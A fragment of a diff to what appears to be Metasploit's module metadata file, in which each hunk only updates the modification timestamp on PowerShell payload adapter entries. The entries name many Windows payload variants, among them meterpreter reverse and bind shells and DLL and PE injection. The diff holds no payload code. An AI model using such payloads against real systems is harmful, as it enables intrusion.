@@ -171497,7 +174717,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/generic/debug_trap",
@@ -171532,7 +174752,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/generic/tight_loop",
@@ -171568,7 +174788,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/loadlibrary",
@@ -171604,7 +174824,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/messagebox",
@@ -171644,7 +174864,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_hidden_ipknock_tcp",
@@ -171684,7 +174904,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_hidden_tcp",
@@ -171723,7 +174943,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_ipv6_tcp",
@@ -171762,7 +174982,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_ipv6_tcp_uuid",
@@ -171801,7 +175021,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_named_pipe",
@@ -171840,7 +175060,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_nonx_tcp",
@@ -171879,7 +175099,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp",
@@ -171920,7 +175140,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp_rc4",
@@ -171959,7 +175179,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp_uuid",
@@ -171997,7 +175217,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/find_tag",
@@ -172038,7 +175258,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_hop_http",
@@ -172077,7 +175297,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_http",
@@ -172116,7 +175336,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_http_proxy_pstore",
@@ -172155,7 +175375,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_https",
@@ -172196,7 +175416,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_https_proxy",
@@ -172235,7 +175455,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_ipv6_tcp",
@@ -172273,7 +175493,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_named_pipe",
@@ -172312,7 +175532,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_nonx_tcp",
@@ -172351,7 +175571,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_ord_tcp",
@@ -172390,7 +175610,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp",
@@ -172429,7 +175649,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_allports",
@@ -172469,7 +175689,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_dns",
@@ -172510,7 +175730,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_rc4",
@@ -172551,7 +175771,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_rc4_dns",
@@ -172590,7 +175810,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_uuid",
@@ -172630,7 +175850,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_winhttp",
@@ -172670,7 +175890,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_winhttps",
@@ -172705,7 +175925,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/metsvc_bind_tcp",
@@ -172740,7 +175960,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/metsvc_reverse_tcp",
@@ -172779,7 +175999,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_hidden_ipknock_tcp",
@@ -172818,7 +176038,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_hidden_tcp",
@@ -172856,7 +176076,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp",
@@ -172895,7 +176115,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp_uuid",
@@ -172932,7 +176152,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_named_pipe",
@@ -172969,7 +176189,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_nonx_tcp",
@@ -173007,7 +176227,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp",
@@ -173047,7 +176267,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp_rc4",
@@ -173085,7 +176305,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp_uuid",
@@ -173121,7 +176341,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/find_tag",
@@ -173159,7 +176379,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_ipv6_tcp",
@@ -173196,7 +176416,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_nonx_tcp",
@@ -173233,7 +176453,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_ord_tcp",
@@ -173271,7 +176491,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp",
@@ -173309,7 +176529,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_allports",
@@ -173348,7 +176568,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_dns",
@@ -173388,7 +176608,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4",
@@ -173428,7 +176648,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4_dns",
@@ -173466,7 +176686,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_uuid",
@@ -173505,7 +176725,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_hidden_ipknock_tcp",
@@ -173544,7 +176764,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_hidden_tcp",
@@ -173582,7 +176802,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp",
@@ -173621,7 +176841,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp_uuid",
@@ -173658,7 +176878,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_named_pipe",
@@ -173695,7 +176915,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_nonx_tcp",
@@ -173733,7 +176953,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp",
@@ -173773,7 +176993,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp_rc4",
@@ -173811,7 +177031,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp_uuid",
@@ -173847,7 +177067,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/find_tag",
@@ -173885,7 +177105,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_ipv6_tcp",
@@ -173922,7 +177142,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_nonx_tcp",
@@ -173959,7 +177179,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_ord_tcp",
@@ -173997,7 +177217,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp",
@@ -174035,7 +177255,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_allports",
@@ -174074,7 +177294,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_dns",
@@ -174114,7 +177334,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4",
@@ -174154,7 +177374,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4_dns",
@@ -174192,7 +177412,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_uuid",
@@ -174231,7 +177451,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_hidden_ipknock_tcp",
@@ -174270,7 +177490,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_hidden_tcp",
@@ -174308,7 +177528,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_ipv6_tcp",
@@ -174347,7 +177567,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_ipv6_tcp_uuid",
@@ -174383,7 +177603,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_named_pipe",
@@ -174419,7 +177639,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_nonx_tcp",
@@ -174457,7 +177677,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_tcp",
@@ -174497,7 +177717,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_tcp_rc4",
@@ -174534,7 +177754,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_tcp_uuid",
@@ -174570,7 +177790,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
